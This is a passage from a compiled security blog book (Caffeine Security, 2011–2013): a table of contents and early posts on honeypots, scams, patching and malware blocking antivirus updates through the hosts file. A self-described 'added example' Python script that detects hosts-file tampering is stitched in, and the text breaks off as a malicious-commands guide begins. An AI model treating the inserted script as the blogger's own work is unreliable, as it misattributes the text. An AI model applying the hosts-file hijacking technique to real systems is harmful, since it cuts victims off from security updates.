
From Blog to Book.

caffeinesecurity.blogspot.com

BlogBook

© 2013 caffeinesecurity.blogspot.com

Contents

1 2011
  1.1 September
    1.1.1 Welcome (2011-09-20 20:14)
    1.1.2 A little note on Password Strength (2011-09-20 20:35)
    1.1.3 Emergency Adobe Flash Patch Today (2011-09-21 02:01)
    1.1.4 Research Project: To Catch a Scammer (2011-09-22 02:01)
    1.1.5 Abandoning the Client-Server Model (2011-09-22 22:03)
    1.1.6 Anonymous Plans Day of Vengeance to Protest Execution, Arrests (2011-09-23 02:00)
    1.1.7 Introducing the Scam Fund! (2011-09-24 01:53)
    1.1.8 Research Project - Project Picnic Basket (2011-09-24 12:32)
    1.1.9 Password Cracker Analysis (2011-09-25 14:39)
    1.1.10 More password analysis (2011-09-26 18:18)
    1.1.11 Solar Activity could cause severe issues (2011-09-26 22:23)
    1.1.12 Listening to a Password Cracker (2011-09-27 21:26)
    1.1.13 Guide to Malicious Linux/Unix Commands (2011-09-30 12:21)
    1.1.14 Ducati Motorcycle Default Password Vulnerability. (2011-09-30 12:42)
  1.2 October
    1.2.1 Flash Drives: Helping Spread Malware since Y2K (2011-10-05 03:00)
    1.2.2 A look at a simple SSH probe and password crack (2011-10-05 22:05)
    1.2.3 What's in a hacker's toolkit? (2011-10-11 20:45)
    1.2.4 Netscape 8? Really? (2011-10-12 17:00)
    1.2.5 Mystery Malware Examined (2011-10-12 18:54)
    1.2.6 A look at the various advance fee fraud methods... (2011-10-13 02:00)
    1.2.7 BUSTED! (2011-10-17 18:22)
  1.3 November
    1.3.1 The Lottery Scam - Jeani's Story (2011-11-07 22:33)
    1.3.2 11/16/11 is American Internet Censorship Day (2011-11-16 18:46)
    1.3.3 If ET were a Hacker, he would just try to phone home... (2011-11-17 18:03)
    1.3.4 Protecting electronic devices from an EMP attack (2011-11-21 07:26)
  1.4 December
    1.4.1 See who's trying to hack your Facebook profile! (2011-12-01 20:20)
    1.4.2 Free IT Security Magazines and Whitepapers from TradePub (2011-12-05 17:51)
    1.4.3 Misuse of Your Personal Information and Google Alerts (2011-12-08 19:49)
    1.4.4 The (VERY) Unofficial Guide To Facebook Privacy (2011-12-11 11:35)
    1.4.5 Introducing Caffeine Security Secure Firefox! (2011-12-11 12:49)
    1.4.6 Mystery Malware: An echo powered DDoS Script? (2011-12-12 19:33)
    1.4.7 Free Subscription to Security Magazine (2011-12-12 20:02)
    1.4.8 Iran, a Lost Drone, and a Computer Virus - Lessons to be Learned (2011-12-13 19:57)
    1.4.9 Holiday Computer Essentials CD (2011-12-15 19:37)
    1.4.10 Insider Threats and Data Loss Prevention (2011-12-16 19:37)
    1.4.11 New Resource: Threat Watch (2011-12-19 18:12)
    1.4.12 Linux/Bckdr-RKC Initial Analysis (2011-12-21 23:32)
    1.4.13 Protect Your Family While Using Social Media (2011-12-22 19:57)
    1.4.14 Linux/Bckdr-RKC: A New Variant Appears (2011-12-26 10:18)
    1.4.15 Woman Gives Birth to Three Plates (2011-12-27 12:59)
    1.4.16 How to Get a Cyber Security or Information Assurance Job (2011-12-27 19:37)
    1.4.17 Anonymous: Friend or Foe? (2011-12-27 22:59)
    1.4.18 Protect Insider Data By Googling First, Often (2011-12-28 10:39)
    1.4.19 Chinese Origins in .ssyslog Decompiled - Linux/Bckdr-RKC and Hutizu (2011-12-30 22:33)
    1.4.20 Following the Trail: Determining the Origins of Linux/Bckdr-RKC (2011-12-31 12:10)

2 2012
  2.1 January
    2.1.1 Malware Analysis Lab - New Feature! (2012-01-04 18:26)
    2.1.2 Monitoring for New Zero Day Exploits through Google Alerts (2012-01-06 19:08)
    2.1.3 Monitoring for Leaked Company Documents through Google Alerts (2012-01-17 14:57)
    2.1.4 SOPA Blackout Day January 18 (2012-01-18 00:40)
    2.1.5 New @CaSec Twitter Feature: #exploitAlert (2012-01-25 13:30)
    2.1.6 CaSec SITREP - Cyber Intelligence for the masses (2012-01-27 16:22)
  2.2 February
    2.2.1 UPDATED: Hutizu and Linux/Bckdr-RKC now have limited detection (2012-02-17 19:01)
  2.3 March
    2.3.1 Coming Soon: Android for the Paranoid Article Series (2012-03-08 10:39)
    2.3.2 Have you checked out the free security magazines lately, available from Caffeine Security? (2012-03-09 15:59)
    2.3.3 Hutizu aka Linux/Bckdr-RKC and Duqu Links? Food for Thought. (2012-03-09 16:28)
    2.3.4 Linux/Bckdr-RKC Delivery Method Analyzed (2012-03-10 11:55)
    2.3.5 Mario 2012 - Help Raise Awareness! (2012-03-17 14:45)
    2.3.6 Hutizu Under the Hood (2012-03-20 17:00)
    2.3.7 Hutizu and Linux/Bckdr-RKC Detection Statistics (2012-03-20 19:13)
    2.3.8 Hutizu/Huituzi - Follow the Gray Rabbit (2012-03-20 19:59)
    2.3.9 Linux Processes Memory Layout, exit, and exit C Functions (2012-03-21 18:35)
    2.3.10 Flash Farce: The Dangers of Social Media Influencing Real World Actions (2012-03-22 17:30)
    2.3.11 Facebook Location Sharing Enabled by Default - Another Threat to your Privacy and Safety (2012-03-26 15:21)
    2.3.12 Executable and Linkable Format (ELF) Guide (2012-03-28 12:09)
    2.3.13 How to Mitigate Anonymous Internet Shutdown March 31 (2012-03-28 18:40)
  2.4 April
    2.4.1 Why am I in Computer Security? Ask the U.S. Commerce Department (2012-04-09 13:50)
    2.4.2 Project Beekeeper - A Mobile Honeypot Project (2012-04-09 23:00)
    2.4.3 Sony BRAVIA TV Datagram Flooding Denial of Service (2012-04-10 15:04)
    2.4.4 I've been losing about 1 lb per day thanks to @ZipFizzCorp (2012-04-10 18:31)
    2.4.5 Warning: Potentially Malicious Unfollow Twitter App (2012-04-12 14:48)
    2.4.6 What if your hardware was infected with a virus? (2012-04-16 10:54)
    2.4.7 Surely this is a legit lottery email and not a scam... (2012-04-18 15:26)
    2.4.8 The scammers just keep getting dumber... (2012-04-23 16:34)
  2.5 May
    2.5.1 New Terms of Use - $500 Processing Fee for Comment Spam (2012-05-06 16:17)
    2.5.2 My Letter to a Spammer (2012-05-06 17:00)
    2.5.3 Hacking Your Digital Camera (2012-05-08 22:55)
    2.5.4 Android for the Paranoid: Fake GPS (2012-05-10 20:23)
    2.5.5 Do you test your Antivirus updates before deployment? (2012-05-15 12:59)
    2.5.6 Warning: CaffeineSecurity dotcom is not mine! (2012-05-23 09:22)
    2.5.7 Keep an eye out for fake Yahoo Browser Plugins! (2012-05-24 11:07)
  2.6 June
    2.6.1 Stuxnet not the first Nation-Sponsored Cyber Attack (2012-06-04 11:52)
    2.6.2 And you Thought your Password Requirements Were Bad... (2012-06-04 13:21)
  2.7 July
    2.7.1 Watch my Honeypot LIVE! (2012-07-10 01:07)
    2.7.2 One Image can Change The World (2012-07-17 18:32)
    2.7.3 New Hacktool Found on my Honeypot nt (2012-07-18 19:56)
    2.7.4 QR Code Analyzer - Android for the Paranoid (2012-07-20 07:22)
    2.7.5 Printer Malware - The Next Big Threat? (2012-07-23 13:54)
    2.7.6 London 2012 Olympics Malware and Scam Alert (2012-07-23 23:05)
    2.7.7 How I cracked the NSA Crypto Challenge in Record Time (2012-07-28 23:33)
    2.7.8 Software Spotlight: Sysinternals RootkitRevealer (2012-07-31 11:17)
  2.8 August
    2.8.1 Default Facebook Privacy Settings Randomly Not Working (2012-08-07 17:00)
    2.8.2 Time is Running Out: The 2038 Problem (also known as Y2K part two) (2012-08-12 18:04)
  2.9 September
    2.9.1 Having Fun with the EICAR Test File (2012-09-06 17:00)
    2.9.2 Why Wikipedia should never be used as a Technical Reference (2012-09-09 07:04)
    2.9.3 Using Google Insights to Track Computer Virus Outbreaks (2012-09-09 08:24)
    2.9.4 Learnist: Share What you Know (2012-09-09 13:46)
    2.9.5 How to Choose the Right Antivirus and Firewall (2012-09-10 20:13)
    2.9.6 The Anonymous Lies Keep Building - GoDaddy and Apple (2012-09-11 12:31)
    2.9.7 Zombie Alert - How to Survive the Coming Zombie Apocalypse (2012-09-11 20:48)
    2.9.8 How Not to Redact a Document (2012-09-16 15:36)
    2.9.9 IE Zero Day Exploit in the Wild (2012-09-17 15:14)
    2.9.10 IE Zero Day and Increase in Global Malware Indicators (2012-09-18 10:51)
    2.9.11 Free trial of VIPRE Antivirus Business (2012-09-23 17:26)
  2.10 October
    2.10.1 Keccak Chosen by NIST as SHA-3 Hashing Algorithm (2012-10-04 14:00)
    2.10.2 Hurricane Sandy Fake Webcam - A Social Engineering Experiment (2012-10-30 16:42)
  2.11 November
    2.11.1 FDA Fails to Properly Evaluate Medical Device Security per U.S. GAO Report (2012-11-04 22:41)
    2.11.2 Threat Watch updated to include Malware Indicator Trends (2012-11-13 12:16)
    2.11.3 Google Two Factor Authentication - Protect Your Gmail and Google+ Account! (2012-11-21 21:31)
    2.11.4 Perpetual Efforts in Futility - A History of Computing Security (2012-11-24 20:06)
    2.11.5 Linux Rootkit bum.pdf dropped onto my Honeypot Today (2012-11-26 20:06)
  2.12 December
    2.12.1 Detecting Targeted Malware and Advanced Persistent Threats (2012-12-06 19:24)
    2.12.2 How (not) to handle software vulnerability submissions (2012-12-26 11:51)
    2.12.3 Snapchat Covert Screen Capture for Android Revealed (2012-12-30 03:02)
    2.12.4 Root @th3j35t3r with Google Chrome (2012-12-31 13:46)

3 2013
  3.1 January
    3.1.1 Anonymous and Steganography - Blindly Distributing Terrorist Messages? (2013-01-03 12:12)
    3.1.2 DISA Gold Disk and SRR - The Lost Security Tools (2013-01-07 10:46)
    3.1.3 If Anonymous is to Survive They Must Remove the Mask (2013-01-13 11:51)
    3.1.4 Seculert Using Scare Tactics to Obtain Customers? (2013-01-13 12:04)
    3.1.5 Spam (2013-01-13 12:05)
    3.1.6 Do you enjoy my posts? Nominate me for a Shorty award! (2013-01-15 15:41)
    3.1.7 Reaching out to the @EFF for assistance with DISA Gold Disk and UNIX SRR FOIA Request (2013-01-17 17:30)
    3.1.8 Entropia - The Online Sweatshop Scam (2013-01-28 11:06)
    3.1.9 Anatomy of a Twitter False Flag-Spam and Dox Attack (2013-01-28 22:03)
  3.2 February
    3.2.1 White House to Issue Cyber Security Executive Order (2013-02-11 21:39)
    3.2.2 Identity of @th3j35t3r Revealed (2013-02-14 20:14)
    3.2.3 Tracking Your Digital Footprint with Google (2013-02-18 23:59)
    3.2.4 Facebook Graph Search and OSINT (2013-02-20 20:21)
    3.2.5 Browsing Safely on an Unsecured Network (2013-02-21 20:00)
  3.3 March
    3.3.1 Caffeine Security Blogging On The Go! (2013-03-05 21:48)
    3.3.2 Guest Post: Ransomware Threat Escalates Worldwide (from @pentesttraining) (2013-03-07 19:18)
    3.3.3 FREE Game Download: PC Defender (2013-03-16 00:51)
    3.3.4 CASP now DoD 8570 Approved - Free Practice Exams to Help Study! (2013-03-16 15:34)
    3.3.5 Anonymous OpIsrael - Prelude to a Hamas Attack? (2013-03-16 16:43)
    3.3.6 Threat Watch Updated with Cyber Threat Forecasting (2013-03-25 09:01)
    3.3.7 Free Windows 8 Security eBook! Expires 4/4 (2013-03-29 21:29)
  3.4 April
    3.4.1 The Cyber Security Silver Bullet is Finally Here! (2013-04-01 14:08)
    3.4.2 If you could ask a question about Space Security what would it be? (2013-04-02 19:51)
    3.4.3 Hackers Breakfast - Absolutely Great Learning Experience (2013-04-03 20:00)
    3.4.4 Voices in the Static: Proactive Cyber Threat Monitoring (2013-04-05 17:26)
    3.4.5 New Research Project: Project Ackbar (It's A Trap!) (2013-04-08 19:36)
    3.4.6 How Rockets and Spacecraft Are Controlled Remotely (2013-04-12 10:42)
    3.4.7 Could you Hack the Mars Rover? (2013-04-12 10:58)
    3.4.8 A Potential Look at the Security Technology Behind #Antares and #Cygnus Remote Control (2013-04-12 12:14)
    3.4.9 Want to Give Me Feedback During the Antares Launch Event? Call Me! (2013-04-12 19:46)
    3.4.10 Space Security Article Series - Stay Tuned! (2013-04-18 23:22)
    3.4.11 Police Scanners and COMSEC (or lack thereof) (2013-04-19 11:16)
    3.4.12 Space Security Starts on the Ground (2013-04-19 20:03)
    3.4.13 When it Comes to Space Security, Safety is Key (2013-04-21 16:21)
    3.4.14 Hacking the News for Profit - Stock Short Selling (2013-04-23 20:15)
    3.4.15 Guest Post: I Can Have Most of My Threat Research Tools in a Single Interface? (2013-04-26 14:06)
  3.5 May
    3.5.1 April 2013 Set a New Record for My Blog - Over 14,000 page views! (2013-05-01 11:39)
    3.5.2 Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats (2013-05-01 12:29)
    3.5.3 OpUSA to Strike US Government and Banking Infrastructure May 7 (2013-05-05 00:42)
    3.5.4 eBook Review: The Password Management Guide (2013-05-05 11:02)
    3.5.5 #OpUSA - So far an Epic Failure (2013-05-06 23:07)
    3.5.6 OpUSA Updated Target List Posted (2013-05-07 00:33)
    3.5.7 The NSA's Guide to Internet Research (2013-05-08 19:40)
    3.5.8 OpUSA Failure Shows Anonymous is Past Their Prime (2013-05-08 22:18)
    3.5.9 Identifying Hacker Group Locations Based Upon Temporal Signatures (2013-05-09 19:15)
    3.5.10 Hacking to Setup a Free Counter Strike Server? (2013-05-10 16:05)
    3.5.11 IRC Floodbot Placed on My Honeypot (2013-05-11 01:09)
    3.5.12 @USNISTGOV CVE Alerts Now On @CaSec Twitter (2013-05-11 08:22)
    3.5.13 How Not to Redact a Document, Part 2 (2013-05-11 09:29)
    3.5.14 New Honeypot Online! (2013-05-11 18:10)
    3.5.15 Facebook Graph Search and Anonymous (2013-05-12 20:58)
    3.5.16 Possibly Malicious Tor Exit Node Found in the Wild (2013-05-17 14:37)
    3.5.17 Tor and Censorship (2013-05-17 19:22)
    3.5.18 OpPetrol - It's Not About the Oil (2013-05-19 14:32)
    3.5.19 FREE CLASS!!! Malicious Software and its Underground Economy (2013-05-19 23:41)
    3.5.20 An Open Letter to @ChaCha Regarding Copyright Infringement (2013-05-20 03:00)
    3.5.21 Tech Support SCAM! The MUST SEE Video about iYogi! (2013-05-21 00:15)
    3.5.22 @ChaCha You Guys Rock, Thanks for the Help! (2013-05-21 00:35)
    3.5.23 FREE eBook: Intrusion Detection Systems with Snort: Advanced IDS Techniques (2013-05-22 19:17)
  3.6 June
    3.6.1 Using Shodan to Measure The Security of the Internet (2013-06-01 02:01)
    3.6.2 Unauthenticated Windows CE Telnet Service Vulnerable Configuration (2013-06-01 02:31)
    3.6.3 New PHP Malware Source Available for Analysis (2013-06-09 00:17)
    3.6.4 Come Join Me On @ThreatConnect and Share Cyber Threat Intelligence (2013-06-13 19:46)
    3.6.5 Anonymous #OpPetrol Most Epic #Fail Yet - Full Analysis Of Results (2013-06-21 10:47)
    3.6.6 Coming Changes and Improvements to Caffeine Security Blog (2013-06-25 17:00)
    3.6.7 Recorded Future Announces Cyber Threat Intelligence Application (2013-06-28 20:42)
    3.6.8 Guest Post: Hackers Breakfast: TrainACE and n2grate Team Up for a Free Hacking Seminar (2013-06-28 20:58)
  3.7 July
    3.7.1 A Confession to my Twitter Users - And Thank You (2013-07-01 23:18)
    3.7.2 Android Pacemaker Exploit Kit Released In Memory of Barnaby Jack (2013-07-28 04:13)
    3.7.3 (2013-07-28 18:31)
    3.7.4 PaceXploit - The Truth Revealed, and an Apology (2013-07-28 23:11)
    3.7.5 How Vulnerable Is The Emergency Alert System? (2013-07-29 19:44)
    3.7.6 DISA Gold Disk FOIA Request Sent (2013-07-30 10:55)
    3.7.7 URGENT! McAfee VirusScan Artemis False Positives! (2013-07-31 20:32)
  3.8 August
    3.8.1 @th3j35t3r Domain Seized by DHS, Arrested at Blackhat? (2013-08-02 14:24)
    3.8.2 Blog Updated to Include Shodan Searches and Free Security Resources (2013-08-02 23:10)
    3.8.3 New Shodan Search: Trilithic (2013-08-02 23:36)
    3.8.4 Massive TOR Hidden Service Compromise (2013-08-04 13:59)
    3.8.5 What the FBI probably knows about Tor Users (2013-08-05 00:31)
    3.8.6 Buyers Guide: Selecting an SSL Management System (2013-08-07 15:47)
    3.8.7 304% Return on Investment with SilverSky Network Security Solutions (2013-08-08 14:32)
    3.8.8 SilverSky Email Encryption Demo (2013-08-08 14:32)
    3.8.9 Email Data Loss Prevention (DLP) (2013-08-08 14:32)
    3.8.10 The Evolution and Value of Purpose-Built Backup Appliances (2013-08-08 20:47)
    3.8.11 Symantec Intelligence Report: June 2013 (2013-08-13 22:47)
    3.8.12 HP StoreOnce: Boldly Go Where No Deduplication Has Gone Before (2013-08-15 12:32)
    3.8.13 A Look At A Simple PHP Cross Site Scripting Attack (2013-08-18 02:00)
    3.8.14 How Virtualization is Key to Managing Risk for the SMB Market (2013-08-19 18:32)
    3.8.15 Implementing Enterprise BYOD with Mobile Certificates (2013-08-21 17:33)
    3.8.16 A Look at Fax Phishing (2013-08-22 18:57)
    3.8.17 My Free Magazines! New Website! (2013-08-24 15:51)
    3.8.18 Blade Server Strategies: Optimizing the Data Center (2013-08-27 16:47)
    3.8.19 Why the Syrian Electronic Army Didn't Hack the NY Times (2013-08-27 20:18)
    3.8.20 #ALERT: As Tensions Escalate with Syria, Beware Phishing Attacks (2013-08-27 23:21)
    3.8.21 Anon Steganography Cracked, Further Mysteries Lie Within (2013-08-30 01:10)
    3.8.22 How to Avoid the Coming Backup Crunch (2013-08-30 16:33)
    3.8.23 Dell AppAssure 5: Free Trial Download (2013-08-30 16:33)
  3.9 September
    3.9.1 Android for the Paranoid - Radiation Alarm (2013-09-02 19:02)
    3.9.2 Eagle Bank Uses Single Sign-On to Secure Deposits and Customer Data (2013-09-04 19:31)
    3.9.3 How Single Sign-On Helped Republic Bank Relieve Password Headaches (2013-09-04 19:31)
    3.9.4 Exchange ActiveSync and BYOD: Potential for Disaster or Foundation for Mobile Success (2013-09-05 13:32)
    3.9.5 Legacy Applications - The Swiss Cheese of Security (2013-09-08 11:38)
    3.9.6 Staying Secure in a Cloudy World (2013-09-16 17:32)
    3.9.7 Real-Time Security Intelligence for Greater Visibility and Information-Asset Protection (2013-09-16 17:32)
    3.9.8 Identity and Access Governance: Bringing Business and IT Together (2013-09-16 17:32)
    3.9.9 Security and HIPAA Compliance: Meeting the Challenge of Securing Protected Health Information (2013-09-16 18:47)
    3.9.10 Top 10 Security Best Practices for Small Business (2013-09-19 14:32)
    3.9.11 Tricks of the Trade - New Whitepaper Available (Malware evading Intrusion Detection) (2013-09-21 13:58)

Chapter 1

2011

1.1

September

1.1.1

Welcome (2011-09-20 20:14)

Welcome to Caffeine Security. Here you will find a daily dose of interesting security articles, news clips, white papers, and research. Computer Security... Cyber Security... Information Assurance... whatever you call it, you know the purpose: protect computer systems and networks from pretty much everything, including malicious users, clueless users, and even mother nature herself! Each day I will try to post one security-related news item. At least once every other week I will be posting some of my thoughts and my own research in the computer security/cyber security/information assurance field. So why Caffeine Security? Obviously we're not trying to protect the secret formula to our favorite soft drinks... but if you're like me, you probably consume large quantities of caffeine just to keep you going in today's stressful security world. Enjoy, and try to have a little fun!

1.1.2

A little note on Password Strength (2011-09-20 20:35)

I've always wondered why organizations encourage such strict, hard-to-remember password combinations, ultimately forcing the user to write down the password and making it less secure. xkcd, a web comic, defines the problem perfectly... [1]xkcd: Password Strength
1. http://xkcd.com/936/

1.1.3

Emergency Adobe Flash Patch Today (2011-09-21 02:01)

Good Morning! Today we will be treated to an emergency patch for Adobe Flash. [1]Prenotification: Security Update for Flash Player. Keep an eye on Adobe's [2]security bulletins page for the patch. Apparently this patch will address zero-day vulnerabilities which are currently being exploited. Happy Patching!
1. http://blogs.adobe.com/psirt/2011/09/prenotification-security-update-for-flash-player.html
2. http://www.adobe.com/support/security/

1.1.4

Research Project: To Catch a Scammer (2011-09-22 02:01)

My first featured research project on this site will be To Catch a Scammer. I'm sure you've heard of NBC's [1]To Catch a Predator. The idea behind this research project is to examine internet scams and frauds, such as Advance Fee Fraud (aka the Nigerian 419 scam), auction scams, stock scams, etc. I am currently researching the techniques used by Advance Fee Fraud scammers. Surely this will be filled with fun. I'm already conversing with one of the scammers, and will be uploading some rather interesting findings soon.
1. http://en.wikipedia.org/wiki/To_Catch_a_Predator

1.1.5

Abandoning the Client-Server Model (2011-09-22 22:03)

Once every two weeks, I will try to write an in-depth blog post on an interesting topic within the security community. My first topic is why the client-server model should be abandoned for antivirus and host intrusion detection/prevention.

It always seems that malware creators are one step ahead of the security community. Their methods for deploying and updating sophisticated botnets seem to be ever evolving, while the security community lags behind in technology. Case in point: [1]Conficker. This amazing piece of malware is protected by cryptographically signed updates using 4096-bit RSA keys, distributed through peer-to-peer updating instead of the traditional client-server model with a centralized command center.

And yet, all home and enterprise virus scanner and host intrusion detection/prevention suites rely upon the client-server model. While this decades-old technology is tried and true, it contains one major flaw: shut off access to the central command server(s), and the system no longer receives updates or reports detected problems. The bad guys know this, and actually program their malware to disable updates by editing the hosts file of infected systems to redirect the domain names of common antivirus vendors to non-existent (or malicious) IP addresses!

I feel it is time to abandon the client-server model for antivirus and intrusion detection. The bad guys are using peer-to-peer technology; why don't we? It makes much more sense to me to create a cryptographically secure peer-to-peer distribution system for definition updates, instead of relying on decades-old primary/backup/tertiary definition distribution servers. After all, we've already perfected the technology through [2]BitTorrent, but that technology is mostly perceived as being used for illegal purposes.

When the original [3]Gnutella client was released, I was very excited. Not because it was a chance to obtain pirated music, but because it was innovative, and an exciting new way to distribute information and open source software. That was over 10 years ago. Peer-to-peer technology has drastically evolved in scalability and design, and yet has only been adopted by the games industry as a means of updating software (see [4]World of Warcraft P2P Updating).

With a peer-to-peer update mechanism for antivirus and host intrusion detection, not only could detection updates be pushed across the network, but so could infection reports: instant visibility across the network of the status of all systems connected to your peer-to-peer security network. Only one question remains. Why hasn't anything like this been implemented yet?
1. http://en.wikipedia.org/wiki/Conficker
2. http://en.wikipedia.org/wiki/BitTorrent_%28protocol%29
3. http://en.wikipedia.org/wiki/Gnutella
4. http://dynamicsubspace.net/2011/05/09/after-reinstall-watching-p2p-work-in-world-of-warcraft/
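The hosts-file trick described in the post above, which maps antivirus vendor domains to bogus addresses so an infected system quietly stops receiving updates, is something a defender can check for directly. The script below is an added example, not code from the blog or from any vendor: it parses a hosts file (comments, tabs, several names per line, IPv4 and IPv6), reports any entry that covers a watched update domain, and distinguishes loopback or unspecified sinkholes, which silently block updates, from redirections to some other address. The watched domains and the sample hosts file are constructed placeholders, not real vendor names.

```python
"""Detect hosts-file entries that hijack security-vendor update domains.

Added example (not the blog's code). The watchlist and sample file are
constructed placeholders; a real deployment would load the vendor domains
an organisation actually depends on and read /etc/hosts or
%SystemRoot%\\System32\\drivers\\etc\\hosts.
"""
import ipaddress

# Constructed watchlist: update domains that should only ever be resolved
# through DNS. Any static hosts entry for them is a finding.
WATCHED_DOMAINS = frozenset({
    "update.example-av.com",
    "liveupdate.example-av.com",
    "definitions.example-hids.net",
})

# Constructed sample hosts file mixing benign and tampered entries.
SAMPLE_HOSTS = """\
# Constructed sample hosts file
127.0.0.1   localhost
::1         localhost ip6-localhost
192.0.2.10  intranet.corp.example          # legitimate internal entry
127.0.0.1   update.example-av.com          # updates silently blocked
198.51.100.7 liveupdate.example-av.com definitions.example-hids.net
0.0.0.0 www.definitions.example-hids.net
"""


def parse_hosts(text):
    """Yield (line_no, ip, [hostnames]) for every active mapping line.

    Blank lines, comment lines and trailing '# ...' comments are ignored,
    as are lines whose first field is not a valid IPv4/IPv6 address.
    """
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()  # handles tabs and runs of spaces
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line, not a mapping
        yield line_no, ip, [h.lower().rstrip(".") for h in fields[1:]]


def is_watched(host, watchlist=WATCHED_DOMAINS):
    """True if host is a watched domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in watchlist)


def find_tampering(text, watchlist=WATCHED_DOMAINS):
    """Return a list of findings, one per watched hostname in the file.

    kind == "blocked"    : mapped to loopback/unspecified (update sinkhole)
    kind == "redirected" : mapped to any other address
    """
    findings = []
    for line_no, ip, hosts in parse_hosts(text):
        for host in hosts:
            if not is_watched(host, watchlist):
                continue
            kind = "blocked" if (ip.is_loopback or ip.is_unspecified) else "redirected"
            findings.append({"line": line_no, "host": host,
                             "ip": str(ip), "kind": kind})
    return findings


if __name__ == "__main__":
    for f in find_tampering(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['host']} -> {f['ip']} ({f['kind']})")
```

Run against the sample it reports four hijacked names: one loopback sinkhole, two redirections to the same foreign address on a single line, and one `0.0.0.0` sinkhole of a subdomain. Either kind is worth an alert; an update server has no legitimate reason to appear in a hosts file at all, which is what makes this check cheap and low-noise compared with trying to judge whether a given address is "correct".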


1.1.6

Anonymous Plans Day of Vengeance to Protest Execution, Arrests (2011-09-23 02:00)

A massive cyber attack is planned for tomorrow, September 24. If your business could be a possible target, you might want to review your Disaster Recovery and Continuity of Operations plans, and be ready to enact them this weekend... From PCMag:

To avenge the Wednesday execution of Troy Davis, hacktivist group Anonymous has added the Atlanta Police Department to its list of targets for a nationwide cyber attack scheduled for this Saturday, September 24.

...

On Wednesday, Anonymous announced a Day of Vengeance starting at noon ET this Saturday, when aligned hackers would launch cyberattacks on targets like Wall Street, corrupt banking institutions, and the New York City Police Department.

Read more at [1]PCMag


1. http://www.pcmag.com/article2/0,2817,2393411,00.asp

1.1.7

Introducing the Scam Fund! (2011-09-24 01:53)

I have decided to begin tracking how much scammers are offering to give to me, and how much money in transaction fees is requested to obtain said funds. Currently, I have been promised over 20 million US Dollars. Please check out the Scam Fund page, which will be updated regularly. [1]Scam Fund
1. http://caffeinesecurity.blogspot.com/p/scam-fund.html

1.1.8

Research Project - Project Picnic Basket (2011-09-24 12:32)

I've decided to start a second research project called Project Picnic Basket. This is of course a reference to Yogi Bear's crazed attempts to obtain any and all picnic baskets. I have set up an SSH honeypot with a weak root password. The honeypot has no access to my internal network, and is actually a virtualized Linux system using [1]Kippo. I've also set up a spam honeypot on this blog site using [2]Project Honey Pot. I will post any interesting results as I get them.
1. http://code.google.com/p/kippo/ 2. http://www.projecthoneypot.org/

1.1.9

Password Cracker Analysis (2011-09-25 14:39)

Well, I'm excited to say that just after a day of running Project Picnic Basket, I've already had someone stumble upon my SSH server and crack the password. This was clearly an unintelligent cracker, which kept trying to crack the password after successfully cracking it. I have taken the passwords which were used in the cracking attempt and dumped them into a nice Google Docs spreadsheet: [1]Project Picnic Basket Cracked Passwords. Is your password on there? I will update the list as I receive more crack attempts.
1. https://docs.google.com/spreadsheet/ccc?key=0AlZA4ubLZ4YKdC16XzVILVktYlFnT2padEVoYlVaRWc&hl=en_US

1.1.10

More password analysis (2011-09-26 18:18)

As more passwords are processed by my honeypot, I've decided to publish the password list in cloud format in addition to the raw data. I feel this visualization is rather insightful, and shows interesting trends in password attempts. [1]Password Cloud. Interestingly enough, the most attempted password is branburica. A [2]Google Search does not yield much info.
1. http://caffeinesecurity.blogspot.com/p/password-cloud.html 2. http://www.google.com/search?q=branburica

1.1.11

Solar Activity could cause severe issues (2011-09-26 22:23)

From [1]http://www.spaceweather.com/

STRONG SOLAR ACTIVITY: Having already unleashed two X-flares since Sept. 22nd, sunspot AR1302 appears ready for more. The active region has a complex beta-gamma-delta magnetic field that harbors energy for strong [2]M- and X-class eruptions. Flares from AR1302 will become increasingly geoeffective as the sunspot turns toward Earth in the days ahead.

Strong solar activity could potentially cause severe disruptions in power grids world-wide, should a solar storm be observed similar to the one from [3]1859, in which telegraph systems all over Europe and North America failed, in some cases even shocking telegraph operators.[4] Telegraph pylons threw sparks and telegraph paper spontaneously caught fire.
1. http://www.spaceweather.com/ 2. http://www.spaceweather.com/glossary/flareclasses.html?PHPSESSID=n0l8vr738b2tjecshdd37aa1s1 3. http://en.wikipedia.org/wiki/Solar_storm_of_1859 4. http://en.wikipedia.org/wiki/Solar_storm_of_1859#cite_note-understandingsocietal-5

1.1.12

Listening to a Password Cracker (2011-09-27 21:26)

I used the P22.com Music Text Composition Generator to create music using attempted usernames and passwords I gathered during just one cracking attempt at my honeypot. The music is recorded at 2400 BPM using Lead 8 (bass + lead). I feel the music has an electrifying video game feel to it. The purpose of this video is to raise online security awareness. I hope you enjoy it! [1]YouTube Link
1. http://www.youtube.com/watch?v=LfiGjotiAA4

1.1.13

Guide to Malicious Linux/Unix Commands (2011-09-30 12:21)

[1]UbuntuGuide.org has an excellent guide to [2]Malicious Linux/Unix Commands which may be observed on live systems or honeypots. Not only is it a good idea to monitor logs for attempts at using these commands, but it may also be a good idea to test your honeypot (especially if it's a virtual machine) to see if these commands will damage/destroy your honeypot. Below is a current copy of the guide. It has already disappeared from the Ubuntu forums, so I felt it would be a good idea to archive it just in case.

This article was originally published in Ubuntu Forums but has recently been removed there. Ubuntuguide feels that knowledge about these risks is more important than any misguided attempts to protect the public by hiding their potential dangers or protect the (K)Ubuntu/Linux image. The original article has therefore been re-created (and subsequently edited) here.

ATTENTION: It is worthwhile to have some basic awareness about malicious commands in Linux. Always be cautious when running one of these (or similar) commands (or downloaded scripts) that have been recommended as a solution to a problem you may have with your computer. It is also worthwhile to always enable a [3]screensaver with a password so that a casual passerby is not able to maliciously execute one of these commands from your keyboard while you are away from your computer. When in doubt as to the safety of a recommended procedure or command, it is best to verify the command's function from several sources, such as from readily available documentation on Linux commands (e.g. manpages).

Here are some common examples of dangerous commands that should raise a red flag. Again, these are extremely dangerous and should not be attempted on any computer that has any physical connection to valuable data. Many of the commands and techniques will cause just as much damage from a LiveCD environment, as well.
This is far from an exhaustive list, but should give some clues as to what kind of things people may try to trick you into doing. Remember these can always be disguised as some obfuscated command or as a part of a long procedure, so the bottom line is to take appropriate caution when executing something that just doesn't feel right.

Delete all files, delete current directory, or delete visible files in current directory

